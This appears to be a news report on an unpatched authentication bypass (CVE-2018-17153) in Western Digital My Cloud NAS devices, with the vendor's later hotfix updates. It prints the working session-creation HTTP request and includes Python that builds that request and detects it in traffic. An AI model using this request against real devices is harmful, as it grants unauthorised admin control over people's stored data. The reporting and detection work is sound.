A vulnerability in Western Digital My Cloud network-attached storage (NAS) that allows an attacker to bypass authentication and take control of the device with administrator permissions remains unpatched almost a year and a half after being reported initially.
The security bug, which received the identification number CVE-2018-17153 on Tuesday, was discovered by security researcher Remco Vermeulen at Securify on April 9, 2017, and reported to Western Digital the next day.
The researcher tested the flaw on a Western Digital My Cloud model WDBCTL0020HWT updated to firmware version 2.30.172. The problem is not limited to this model, though, because My Cloud products share the same code.
Authenticating to a My Cloud device creates a server-side session that is bound to the user's IP address. Once that session exists, authenticated CGI modules can be called simply by sending the cookie 'username=admin' with the HTTP request; the cookie carries no secret of its own.
"It was found that it is possible for an unauthenticated attacker to create a valid session without requiring to authenticate. The network_mgr.cgi CGI module contains a command called cgi_get_ipv6 that starts an admin session that is tied to the IP address of the user making the request when invoked with the parameter flag equal to 1," Vermeulen explains.
With such a session in place for their IP address, an attacker who sets the 'username=admin' cookie gets admin-level access to the device.
The researcher published proof-of-concept code and detailed the steps needed to take control of a My Cloud NAS.
The attacker first creates an admin session bound to their own IP address with a single unauthenticated request:
POST /cgi-bin/network_mgr.cgi HTTP/1.1
Host: wdmycloud.local
Content-Type: application/x-www-form-urlencoded
Cookie: username=admin
Content-Length: 23

cmd=cgi_get_ipv6&flag=1
From that point on, any request the attacker sends to the device's authenticated CGI modules from the same IP address is accepted as long as it carries the 'username=admin' cookie; no password is ever supplied.
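To make both halves of the bypass concrete, the Python below (an added example, not the researcher's proof of concept and not code from Western Digital) builds the session-creation request exactly as shown above, with Content-Length derived from the body rather than hard-coded, and then flags that request pattern in captured HTTP requests, which is the check an owner who cannot patch yet would want on a proxy or IDS in front of the NAS. The sample captures are constructed for the example; the detector also reads parameters from the query string, which is an assumption on our part, since the advisory shows only the POST-body form.

```python
"""Added example, not code from the Securify advisory or BleepingComputer.

Reproduces the session-creation POST from the advisory as raw bytes and
detects that pattern in captured HTTP requests. The sample captures below
are constructed for the example; the only identifiers taken from the
advisory are /cgi-bin/network_mgr.cgi, cgi_get_ipv6 and flag=1.
"""
from urllib.parse import parse_qs, urlsplit

BYPASS_PATH = "/cgi-bin/network_mgr.cgi"
BYPASS_CMD = "cgi_get_ipv6"


def build_session_request(host: str = "wdmycloud.local") -> bytes:
    """Raw request that makes the NAS open an admin session for our IP.

    Content-Length is computed from the body instead of hard-coded, so the
    request stays valid if the body is edited.
    """
    body = f"cmd={BYPASS_CMD}&flag=1"
    head = "\r\n".join([
        f"POST {BYPASS_PATH} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        "Cookie: username=admin",  # every later request needs this cookie
        f"Content-Length: {len(body)}",
    ])
    return (head + "\r\n\r\n" + body).encode()


def parse_request(raw: bytes):
    """Minimal HTTP/1.x request parser.

    Returns (method, path, query, headers, body), or None when the request
    line is malformed.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    method, target, _version = parts
    url = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method.upper(), url.path, url.query, headers, body.decode("latin-1")


def is_bypass_attempt(raw: bytes) -> bool:
    """True when a request invokes cgi_get_ipv6 with flag=1 on network_mgr.cgi.

    Parameters are read from both the query string and a form-encoded body.
    That a CGI handler may accept either is our assumption, not the
    advisory's; the advisory only shows the POST-body form.
    """
    parsed = parse_request(raw)
    if parsed is None:
        return False
    method, path, query, headers, body = parsed
    if path != BYPASS_PATH:
        return False
    params = parse_qs(query)
    content_type = headers.get("content-type", "")
    if method == "POST" and content_type.startswith("application/x-www-form-urlencoded"):
        for key, values in parse_qs(body).items():
            params.setdefault(key, []).extend(values)
    return BYPASS_CMD in params.get("cmd", []) and "1" in params.get("flag", [])


# Constructed sample captures (not real traffic): the exploit request, a call
# to the same CGI without flag=1, and an unrelated page fetch.
SAMPLE_CAPTURES = [
    build_session_request(),
    b"POST /cgi-bin/network_mgr.cgi HTTP/1.1\r\nHost: wdmycloud.local\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 16\r\n\r\n"
    b"cmd=cgi_get_ipv6",
    b"GET /index.html HTTP/1.1\r\nHost: wdmycloud.local\r\n\r\n",
]


def flag_bypass_attempts(captures):
    """Indices of captured requests that match the bypass pattern."""
    return [i for i, raw in enumerate(captures) if is_bypass_attempt(raw)]


if __name__ == "__main__":
    print(build_session_request().decode())
    print("bypass attempts at indices:", flag_bypass_attempts(SAMPLE_CAPTURES))
```

The detector keys on the command and flag rather than on the cookie: 'username=admin' is a fixed, public value that legitimate sessions also send, so it is not worth alerting on by itself, whereas a cgi_get_ipv6 call with flag=1 from an address that has not logged in is exactly the event the advisory describes.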
Vermeulen told BleepingComputer that My Cloud NAS systems can also be compromised through cross-site request forgery (CSRF) attacks delivered in malvertising campaigns, which lets an attacker reach devices that are not exposed to the internet, because the victim's browser issues the requests from inside the local network.
Vermeulen is not the only one who found the vulnerability. Last year, the security group Exploiteers disclosed it at the DEF CON security conference.
The group says it contacted Western Digital about the issue but the company refused to acknowledge or fix it. As a result, Exploiteers member Zenofex built a Metasploit module that exploits the vulnerability.
In August, the group published a video demonstrating two vulnerabilities, one of them the authentication bypass now tracked as CVE-2018-17153.
At the time of writing, about 1,870 Western Digital My Cloud NAS systems are reachable from the internet, most of them in Europe; the number changes constantly.
NAS devices are typically used for backups, so they are very likely to hold data that is valuable to their owners.
With at least two researchers having reported the vulnerability more than a year ago, proof-of-concept code freely available and an exploitation module ready to use, attackers are likely to turn to Western Digital products, which look ripe for ransomware attacks.
Update [09/19/18 16:31]: Western Digital contacted BleepingComputer on Twitter to say that it is in the final stage of preparing a firmware update that addresses CVE-2018-17153.
"We expect to post the update on our technical support site at https://support.wdc.com/ within a few weeks," the company says in an announcement published today, in which it recommends that NAS owners enable automatic updates and avoid exposing the device directly to the internet.
Update [09/21/18]: Western Digital now has a hotfix for the My Cloud authentication bypass vulnerability.